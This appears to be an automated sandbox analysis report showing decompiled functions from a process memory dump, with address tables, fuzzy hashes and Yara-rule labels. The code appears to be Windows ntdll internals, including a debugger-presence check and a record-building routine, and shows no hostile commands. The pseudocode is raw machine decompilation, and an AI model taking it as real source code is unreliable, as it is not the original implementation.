0x00e7477a
0x00000000
0x00e7477a
0x00e2f738
0x00e2f73a
0x00e2f73c
0x00e2f73f
0x00e2f746
0x00e2f778
0x00e2f7a9
0x00e2f7a9
0x00e2f754
0x00e2f75a
0x00e2f75d
0x00e2f75f
0x00e2f761
0x00e2f76f
0x00e2f771
0x00e2f771
0x00e2f76f
0x00e2f763
0x00000000
0x00e2f763
0x00e2f77d
0x00e2f7a3
0x00e2f7a5
0x00000000
0x00e2f7a5
0x00e2f77f
0x00e2f782
0x00e2f784
0x00e2f786
0x00000000
0x00000000
0x00000000
0x00e2f788
0x00e2f748
0x00e2f74d
0x00e2f78d
0x00e2f793
0x00e2f7b7
0x00e2f7bc
0x00000000
0x00e2f7bc
0x00e2f798
0x00000000
0x00000000
0x00e2f79d
0x00e2f7b0
0x00000000
0x00e2f7b0
0x00e2f79f
0x00000000
0x00e2f74f
0x00e2f74f
0x00000000
0x00e2f74f

Strings

Actx , xrefs: 00E2F73F

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 897d01695619779310195b00f3fc3f35413b2ead2afa954f421d44e7925ff03f
Instruction ID: bd99afa05f1bcc394fb2c8f922cd26acf364162dda55da7b077c690c15f62c57
Opcode Fuzzy Hash: 897d01695619779310195b00f3fc3f35413b2ead2afa954f421d44e7925ff03f
Instruction Fuzzy Hash: B111E2343246228BEB284E1DE9907B673B5EB95728F34653BE866FB390DB70CC009340

Uniqueness

Uniqueness Score: -1.00%

Function 00EB8DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00EB8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0xee0d50);
				E00E5D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E00E95720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L00E5DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L00E5DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E00E5D130(_t34, _t39, _t40);
			}

0x00eb8df1
0x00eb8df1
0x00eb8df1
0x00eb8df1
0x00eb8df1
0x00eb8df1
0x00eb8df3
0x00eb8df8
0x00eb8dfd
0x00eb8e00
0x00eb8e0e
0x00eb8e2a
0x00eb8e36
0x00eb8e38
0x00eb8e3c
0x00eb8e46
0x00eb8e46
0x00eb8e36
0x00eb8e50
0x00eb8e56
0x00eb8e59
0x00eb8e5c
0x00eb8e60
0x00eb8e67
0x00eb8e6d
0x00eb8e73
0x00eb8e74
0x00eb8eb1
0x00eb8ebd

Strings

Critical error detected %lx, xrefs: 00EB8E21

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: facf38c164d6a15f2f0328c1aba454db78dafb7287f31da518c27cc6eb83e1f3
Instruction ID: 74cfda67c5ab39c2e7d9c77c0a9348f68eee07c534c27e26560a0f9281ab33c4
Opcode Fuzzy Hash: facf38c164d6a15f2f0328c1aba454db78dafb7287f31da518c27cc6eb83e1f3
Instruction Fuzzy Hash: 14117571D14348DADF25CFA88A067DDBBB5AB04315F24665EE428BB392CB708A06CF14

Uniqueness

Uniqueness Score: -1.00%

Function 00E9FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 00E9FF60

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: d9cfa938eeb63a7417b6b881a3881040e8e45fab02acde961ff1c8db2cd5d542
Instruction ID: 2a82423464171210eb236371d5ff0f4a20792d8fead348152ef52ea45b8f21a6
Opcode Fuzzy Hash: d9cfa938eeb63a7417b6b881a3881040e8e45fab02acde961ff1c8db2cd5d542
Instruction Fuzzy Hash: 1011E171A10544EFCF22DB50CD49FA8BBB1FF48709F149454F508B72A2C7799984CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00ED5BA5, Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00ED5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0xee1178);
				E00E5D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E00ED4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E00E4D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E00ED5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0xef60e8;
								if( *0xef60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0xef60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E00E49710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E00E46DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E00E4F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E00E4F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E00E4F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E00E4FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E00E4FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E00E4F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E00E4F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E00ED4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E00E5D130(_t427, _t494, _t511);
				}
			}

0x00ed5ba5
0x00ed5baa
0x00ed5baf
0x00ed5bb4
0x00ed5bb6
0x00ed5bbc
0x00ed5bbe
0x00ed5bc4
0x00ed5bcd
0x00ed5bd3
0x00ed5bd6
0x00ed5bdc
0x00ed5be0
0x00ed5be3
0x00ed5beb
0x00ed5bf2
0x00ed5bf8
0x00ed5bfe
0x00ed5c04
0x00ed5c0e
0x00ed5c18
0x00ed5c1f
0x00ed5c25
0x00ed5c2a
0x00ed5c2c
0x00ed5c32
0x00ed5c3a
0x00ed5c3f
0x00ed5c42
0x00ed5c48
0x00ed5c5b
0x00ed5c5b
0x00ed5c2c
0x00ed5cb7
0x00ed5cb9
0x00ed5cbf
0x00ed5cc2
0x00ed5cca
0x00ed5ccb
0x00ed5ccb
0x00ed5cd1
0x00ed5cd7
0x00ed5cda
0x00ed5ce1
0x00ed5ce4
0x00ed5ce7
0x00ed5ced
0x00ed5cf3
0x00ed5cf9
0x00ed5cff
0x00ed5d08
0x00ed5d0a
0x00ed5d0e
0x00ed5d10
0x00000000
0x00000000
0x00ed5d16
0x00ed5d1a
0x00000000
0x00000000
0x00ed5d20
0x00ed5d22
0x00ed5d25
0x00ed5d2f
0x00ed5d2f
0x00ed5d33
0x00ed5d3d
0x00ed5d49
0x00ed5d4b
0x00000000
0x00000000
0x00ed5d5a
0x00ed5d5d
0x00ed5d60
0x00000000
0x00000000
0x00ed5d66
0x00ed5d69
0x00000000
0x00000000
0x00ed5d6f
0x00ed5d6f
0x00ed5d73
0x00ed5d79
0x00ed5d7f
0x00ed5d86
0x00ed5d95
0x00ed5d98
0x00ed5dba
0x00ed5dcb
0x00ed5dce
0x00ed5dd3
0x00ed5dd6
0x00ed5dd8
0x00ed5de6
0x00ed5dec
0x00ed5dee
0x00ed5df1
0x00ed5df3
0x00ed635a
0x00ed635a
0x00000000
0x00ed635a
0x00ed5dfe
0x00ed5e02
0x00ed5e05
0x00ed5e07
0x00ed5e10
0x00ed5e13
0x00ed5e1b
0x00ed5e1c
0x00ed5e21
0x00ed5e22
0x00ed5e23
0x00ed5e25
0x00ed5e2a
0x00ed5e2c
0x00ed5e2e
0x00ed5e36
0x00ed5e39
0x00ed5e42
0x00ed5e47
0x00ed5e4d
0x00ed5e54
0x00ed5e54
0x00ed5e54
0x00ed5e2e
0x00ed5e5c
0x00ed5e5f
0x00ed5e62
0x00ed5e64
0x00ed5e6b
0x00ed5e70
0x00ed5e7a
0x00ed5e7a
0x00ed5e7a
0x00ed5e6b
0x00ed5e7e
0x00ed5e7f
0x00ed5e7f
0x00ed5e81
0x00ed5e87
0x00ed5e8b
0x00ed5e8c
0x00ed5e8c
0x00ed5e8c
0x00ed5e9a
0x00ed5e9c
0x00ed5ea2
0x00ed5ea6
0x00ed5f50
0x00ed5f50
0x00ed5f57
0x00ed5f66
0x00ed5f66
0x00ed5f66
0x00ed5f68
0x00ed5f6a
0x00ed63d0
0x00000000
0x00ed5f70
0x00ed5f70
0x00ed5f91
0x00ed5f9c
0x00ed5f9e
0x00ed5fa4
0x00ed5fa6
0x00ed638c
0x00ed6392
0x00ed63a1
0x00ed63a7
0x00ed63af
0x00ed63af
0x00ed63bd
0x00ed63d8
0x00000000
0x00ed63d8
0x00ed5fac
0x00ed5fb2
0x00ed5fb4
0x00ed5fbd
0x00ed5fc6
0x00ed5fce
0x00ed5fd4
0x00ed5fdc
0x00ed5fec
0x00ed5fed
0x00ed5fee
0x00ed5fef
0x00ed5ff9
0x00ed5ffa
0x00ed5ffb
0x00ed5ffc
0x00ed6000
0x00ed6004
0x00ed6012
0x00ed6012
0x00ed6018
0x00ed6019
0x00ed601a
0x00ed601b
0x00ed601c
0x00ed6020
0x00ed6059
0x00ed605c
0x00ed6061
0x00ed6061
0x00ed6022
0x00ed6022
0x00ed6022
0x00ed6025
0x00ed602a
0x00ed602b
0x00ed6031
0x00ed6037
0x00ed6038
0x00ed603e
0x00ed6048
0x00ed6049
0x00ed604a
0x00ed604b
0x00ed604c
0x00ed604d
0x00ed6053
0x00ed6054
0x00ed6054
0x00ed6062
0x00ed6065
0x00ed6067
0x00ed606a
0x00ed6070
0x00ed6075
0x00ed6076
0x00ed6081
0x00ed6087
0x00ed6095
0x00ed6099
0x00ed609e
0x00ed60a4
0x00ed60ae
0x00ed60b0
0x00ed60b3
0x00ed60b6
0x00ed60b8
0x00ed60ba
0x00ed60ba
0x00ed60ba
0x00ed60ba
0x00ed60be
0x00ed60c0
0x00ed60c5
0x00ed60c5
0x00ed60c5
0x00ed60c6
0x00ed60cd
0x00ed6114
